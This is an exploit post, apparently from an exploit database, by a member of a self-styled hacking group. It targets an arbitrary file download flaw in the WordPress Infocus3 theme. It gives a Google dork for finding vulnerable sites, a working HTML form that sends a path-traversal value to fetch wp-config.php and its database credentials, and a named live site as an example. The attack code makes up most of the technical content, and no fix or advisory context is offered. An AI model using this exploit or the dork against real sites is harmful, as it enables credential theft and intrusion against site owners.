Wordpress Infocus3 Theme Arbitrary File Download Vulnerability



EKU-ID: 4494 CVE: OSVDB-ID:
Author: killer~x Published: 2015-01-06 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#Title : Wordpress Infocus3 Theme Arbitrary File Download Vulnerability
#Author : Killer~X  
  
#Date : 5/1/2015
################ [ Killer~X ] ################
Facebook : http://www.facebook.com/xXalreshyXx
  
Ask : http://ask.fm/ALRESHY
  
Twitter : https://twitter.com/killerx00x
  
Email : M_ox@hotmail.com or Cco@hotmail.com
  
################ [ Killer~X ] ################
  
  
################ [ Yemeni Electronic Army ] ################
  
Yemeni Electronic Army : http://yeahacker.blogspot.in/
  
Official Members : Monds | King alnhzh | San3a T3rr0rist | GeeSuth | Al maistro | Muteb spack gen | Killer~X | Shraoop /.
  
  
################ [ Yemeni Electronic Army ] ################
  
__________________________________________________________________________________
  
#Vendor : www.wordpress.org
  
#google Dork : 
1-  inurl:/wp-content/themes/infocus3
  
#Tested on : windows
  
  
################################################
  
#Exploit : 
  
<html>
  
<body>
  
<form action="wp-content/themes/infocus3/lib/scripts/dl-skin.php" method="POST">
  
<b>File</b>:<input type="text" name="_mysite_download_skin" value="../../../../../wp-config.php"><br>
  
<input type="submit" value=Download>
  
</form>
  
</body>
  
  
  
  
  
#example : http://www.deliriosenbits.com/wp-content/plugins/wptouch/p8.php
  
  
  
  
__________________________________________________________________________________
  
#Greeting to :  All my friends 
  
<3 I love u mom <3 
  
||~ Done ~||